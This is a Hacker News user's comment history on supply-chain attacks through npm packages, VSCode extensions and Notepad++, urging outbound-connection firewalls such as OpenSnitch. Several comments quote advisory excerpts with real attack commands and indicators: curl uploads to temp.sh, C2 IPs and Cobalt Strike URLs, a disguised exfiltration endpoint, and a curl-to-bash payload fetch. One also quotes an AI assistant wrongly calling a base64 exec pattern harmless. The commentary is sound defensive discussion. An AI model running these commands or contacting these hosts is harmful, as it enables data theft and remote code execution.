Hacker News: gus_

New comment by gus_ in "GitHub confirms breach of 3,800 repos via malicious VSCode extension"

gus_ — Wed, 20 May 2026 13:33:55 +0000

the pop-ups fatigue is already an issue, and not an easy one to solve. Pretty much like SIEM/SOC alerts.

> The trick is to infect a plugin that has a legitimate reason for accessing the internet or running certain commands, and then coming up with ways to abuse that to exfiltrate the data. Or exfiltrating via DNS queries, or some other vector that isn't so obvious as "allow TCP/UDP connections to the whole world".

They'll get there, maybe. But the reality is that right now, everyone allows outbound requests blindly.

Instead of speculating, I suggest to actually investigate current IOCs and common tactics of malicious npm/pip/plugins/VS extensions. Something like this:

https://github.com/evilsocket/opensnitch/discussions/1119

Or use OpenSnitch (or Lulu, Glasswire, ZoneAlarm anyone?:D etc) to actually analyze real VS malicious extensions or npm packages and see if it stops the exfiltration, and if not, suggest ways to improve it. For example:

https://markdownpastebin.com/?id=9c294c75f09349d2977a4ccd250...

New comment by gus_ in "GitHub is investigating unauthorized access to their internal repositories"

gus_ — Wed, 20 May 2026 10:19:52 +0000

> It's trivial to do this in a way to avoid detection

I'd love to see a real example/PoC.

Anyway, we discussed this issue in the other thread. For me, unrestricted outbound requests to any url, whether it's well known domains like api.github.com or any other domain, are a red flag.

Why does VS need to establish outbound requests to any domain, without authorization?

There's no magic solution, and these attacks will evolve, but I still think that restricting outbound requests is a good measure to mitigate these attacks.

> slurps up all of the users private keys/tokens/env-vars it can find and sends this off somewhere covertly.

Isolating applications can also mitigate the impact of these attacks. For example, you can restrict VS code to only share with the host .vscode/, .git/ and other directories. Even by project. Again, it's not bulletproof, but helps.

New comment by gus_ in "Mini Shai-Hulud Strikes Again: 314 npm Packages Compromised"

gus_ — Wed, 20 May 2026 09:04:07 +0000

absolutely. These attacks will evolve for sure, like the malware evolved on Microslop for years.

But for the time being, the common entry vector is clear:

https://github.com/evilsocket/opensnitch/discussions/1119

> 2) trigger a tab open to attacker's website

be sure not to use extra cli parameters like "firefox --new-tab ", because if the rule is filtering by process path + cmdline it'll trigger a pop-up to allow the outbound request.

New comment by gus_ in "GitHub confirms breach of 3,800 repos via malicious VSCode extension"

gus_ — Wed, 20 May 2026 08:04:16 +0000

so how did they exfiltrate the information without noticing? what OS was the developer using? what security measures were they using?

yesterday discussion https://news.ycombinator.com/item?id=48191680

New comment by gus_ in "Mini Shai-Hulud Strikes Again: 314 npm Packages Compromised"

gus_ — Tue, 19 May 2026 19:03:28 +0000

btw, this analysis of a node linux malware with OpenSnitch and other tools was published on reddit a year ago (a malicious linkedin interview targeting web3/crypto devs that resulted in a system compromise):

https://markdownpastebin.com/?id=9c294c75f09349d2977a4ccd250...

New comment by gus_ in "Mini Shai-Hulud Strikes Again: 314 npm Packages Compromised"

gus_ — Tue, 19 May 2026 13:50:36 +0000

Personally I don't allow outbound connections from almost any app, except web browsers to port 80/443. So nodejs, pip, ruby, curl, wget, etc, opening unexpected outbound connections is a big red flag for me.

In some cases, maybe you need to allow permanently git to open outbound resquests to github.com (or gitlab, etc), but at least in my case, I'm okey allowing these connections manually.

> preinstall script: bun run index.js

> Dual exfiltration: > stolen data is committed as Git objects to public GitHub repositories (api.github.com) > and sent as RSA+AES encrypted HTTPS POSTs to hxxps://t.m-kosche[.]com/api/public/otel/v1/traces (disguised as OpenTelemetry traces)

> The Bun installer command (command -v bun >/dev/null 2>&1 || (curl -fsSL https://bun.sh/install | bash && export PATH=$HOME/.bun/bin:$PATH)) prepends every injected hook to guarantee Bun availability

> A separate gh-token-monitor daemon (decrypted from J7, deployed by class so) installs to ~/.local/bin/gh-token-monitor.sh with its own systemd service and LaunchAgent. It polls stolen GitHub tokens at 60-second intervals with a 24-hour TTL

This attack in particular would have caused OpenSnitch to go crazy, giving you the opportunity to review what's going on.

New comment by gus_ in "France to ditch Windows for Linux to reduce reliance on US tech"

gus_ — Fri, 10 Apr 2026 16:58:24 +0000

https://itsfoss.com/munich-linux-failure/

It doesn't matter if this or that doesn't work. Or if Microslop pressures to continue using Winslop.

Now the reasons are geopolitical.

New comment by gus_ in "LittleSnitch for Linux"

gus_ — Thu, 09 Apr 2026 07:48:33 +0000

OpenSnitch (+ block lists) ;)

or DNS stubs with filtering capabilities.

New comment by gus_ in "My minute-by-minute response to the LiteLLM malware attack"

gus_ — Thu, 26 Mar 2026 19:17:49 +0000

In this case, this has nothing to do with reverse engineering, it's basic system administration.

See how the AI points you in the "right" direction:

  What likely happened:
  The exec(base64.b64decode('...')) pattern is not malware — it's how Python tooling (including Claude Code's Bash tool) passes code snippets to python -c while avoiding shell escaping issues.

Any base64 string passed to python via cmdline should be considered as HIGHLY suspicious, by default. Or anything executed from /tmp, /var/tmp, /dev/shm.

  Exfiltrates data to https://models.litellm.cloud/ encrypted with RSA

if @op would have had Lulu or LittleSnitch installed, they would probably have noticed (and blocked) suspicious outbound connections from unexpected binaries.

Having said this, uploading a binary to Claude for analysis is a different story.

New comment by gus_ in "Notepad++ supply chain attack breakdown"

gus_ — Wed, 04 Feb 2026 10:02:51 +0000

running apps in a sandbox is ok, but remember to disable internet access. A text editor should not require it, and can be used to exfiltrate the text(s) you're editing.

    When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:

    3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
    4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202

    The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.

    The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin

New comment by gus_ in "Threat actors expand abuse of Microsoft Visual Studio Code"

gus_ — Thu, 22 Jan 2026 09:28:37 +0000

  On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely

Unrestricted outbound connections, specially from curl/wget/bash

New comment by gus_ in "Show HN: Witr – Explain why a process is running on your Linux system"

gus_ — Sat, 27 Dec 2025 15:35:47 +0000

I'd not trust any app that parses /proc to obtain process information (for reasons [0]), specially if the machine has been compromised (unless by "incident", the author means another thing):

https://github.com/pranshuparmar/witr/tree/main/internal/lin...

It should be the last option.

[0] https://news.ycombinator.com/item?id=46364057

New comment by gus_ in "Snitch – A friendlier ss/netstat"

gus_ — Tue, 23 Dec 2025 16:19:44 +0000

ss obtains the connections information via netlink directly from the kernel (besides parsing /proc):

https://manpages.debian.org/bookworm/manpages/sock_diag.7.en...

https://github.com/vishvananda/netlink/blob/main/inet_diag.g...

Not many rootkits tamper the netlink channel, so in most cases it's a bit more reliable.

New comment by gus_ in "Snitch – A friendlier ss/netstat"

gus_ — Tue, 23 Dec 2025 10:15:52 +0000

At the very least, these tools should not parse /proc to obtain information of processes or connections. It should be the last option.

Many LD_PRELOAD rootkits hide their activity from the system by manipulating the output of libc functions like readdir(), open(), stat(), etc. kernel rootkits can hide whatever they need, but the common functionality is also to hide data from /proc.

That's why netstat, ps, *top or lsof are not reliable tools if the system is compromised. ss is a bit different and is a bit more reliable.

In this case, snitch is written in Go, which doesn't use the libc functions, so probably it'll be able to obtain information from /proc even if hidden by a LD_PRELOAD rootkit.

Another option would be to compile the binary statically.

Anyways, these tools are not meant to unhide malicious traffic or processes, so I think detecting beacons, inspecting traffic, etc, is out of the scope.

Resources:

https://github.com/gustavo-iniguez-goya/decloaker

User-space library rootkits revisited: Are user-space detection mechanisms futile? - https://arxiv.org html/2506.07827v1

The Hidden Threat: Analysis of Linux Rootkit Techniques and Limitations of Current Detection Tools - https://dl.acm.org/doi/10.1145/3688808

https://matheuzsecurity.github.io/hacking/bypass-userland-ho...

https://ops.tips/blog/how-is-proc-able-to-list-pids/

New comment by gus_ in "I got hacked: My Hetzner server started mining Monero"

gus_ — Thu, 18 Dec 2025 13:23:10 +0000

restricting outbound connections by binary: OpenSnitch .

You can also restrict outbound connections to cryptomining pools and malicious IPs. For example by using IOCs from VirusTotal or urlhaus.bazaar.ch

New comment by gus_ in "I got hacked: My Hetzner server started mining Monero"

gus_ — Thu, 18 Dec 2025 12:43:43 +0000

I agree. That's why I said that it's also useful. It won't work in all scenarios, but in most of the cryptomining attacks, files dropped to /tmp are binaries.

New comment by gus_ in "I got hacked: My Hetzner server started mining Monero"

gus_ — Thu, 18 Dec 2025 00:56:12 +0000

it doesn't matter what netfilter frontend you use if you allow outbound connections from any binary.

In order to stop these attacks, restrict outbound connections from unknown / not allowed binaries.

This kind of malware in particular requires outbound connections to the mining pools. Others downloads scripts or binaries from remote servers, or try to communicate with their c2c servers.

On the other hand, removing exec permissions to /tmp, /var/tmp and /dev/shm is also useful.

New comment by gus_ in "NPM flooded with malicious packages downloaded more than 86k times"

gus_ — Fri, 31 Oct 2025 08:18:47 +0000

probably no:

https://github.com/evilsocket/opensnitch/discussions/1290

that malware campaign is still active.

New comment by gus_ in "The scariest "user support" email I've received"

gus_ — Tue, 21 Oct 2025 08:28:33 +0000

nowadays, restricting outgoing connections initiated by unknown binaries should be a must. Specially if it's launched from /tmp

Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.

New comment by gus_ in "I almost got hacked by a 'job interview'"

gus_ — Wed, 15 Oct 2025 17:35:18 +0000

specially interpreters: python, perl, npm, etc.

https://github.com/evilsocket/opensnitch/wiki/Rules#best-pra...